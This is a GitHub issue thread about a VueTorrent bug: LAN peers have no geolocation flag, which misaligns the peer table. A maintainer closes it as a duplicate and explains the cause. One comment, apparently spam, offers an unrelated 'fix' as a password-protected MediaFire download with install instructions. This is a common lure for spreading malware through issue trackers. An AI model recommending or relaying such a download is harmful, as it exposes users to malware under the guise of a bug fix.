### ISSUE TITLE
[Bug]: Peer list broken by LAN ip

### ISSUE THREAD

**Issue by Gunni** [VueTorrent/VueTorrent#1881]
### Bug description

When a lan IP is connected as a peer, it has no flag, shifting its row

### Expectations

Put a placeholder or empty column for flag if unset.

### Relevant debug informations

![Screenshot 2024-09-01 225930](https://github.com/user-attachments/assets/2bdaeed7-72ee-495b-8ae6-2d0f1d6e44bc)

### Steps to reproduce

1. download torrent on two computers on lan
2. ensure they connect to each other
3. Observe table fail

### How did you install VueTorrent?

Downloaded from GitHub releases

### Environment description

```plain text
Device type: Desktop 
OS: Windows
Browser (name and version): Firefox 129.0.2 (64-bit)

PWA: No
Running inside a container: Yes
```

### qBittorrent version

4.6.5

### VueTorrent version

2.12.0

### Agreements

- [ ] The bug still occurs on the nightly build
- [X] The bug still occurs on the latest version of qBittorrent
- [X] A similar issue doesn't already exist
- [X] I checked the DevTools and included any errors that may show up

**Comment by goncastrum** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by Larsluph** [comment]
Duplicate of #1872

This is caused by private IPs not having geolocation data for obvious reasons.

I'll ask the same question to ensure reproductibility, can you include the qbittorrent response's row entry without the country data?

Response data should be named "peers" in the DevTools.
See [Support](https://github.com/VueTorrent/VueTorrent/wiki/Support) for help

**Comment by Gunni** [comment]
Duplicate of https://github.com/VueTorrent/VueTorrent/issues/1872

Sorry, don't have a reproducer at the moment and no time.
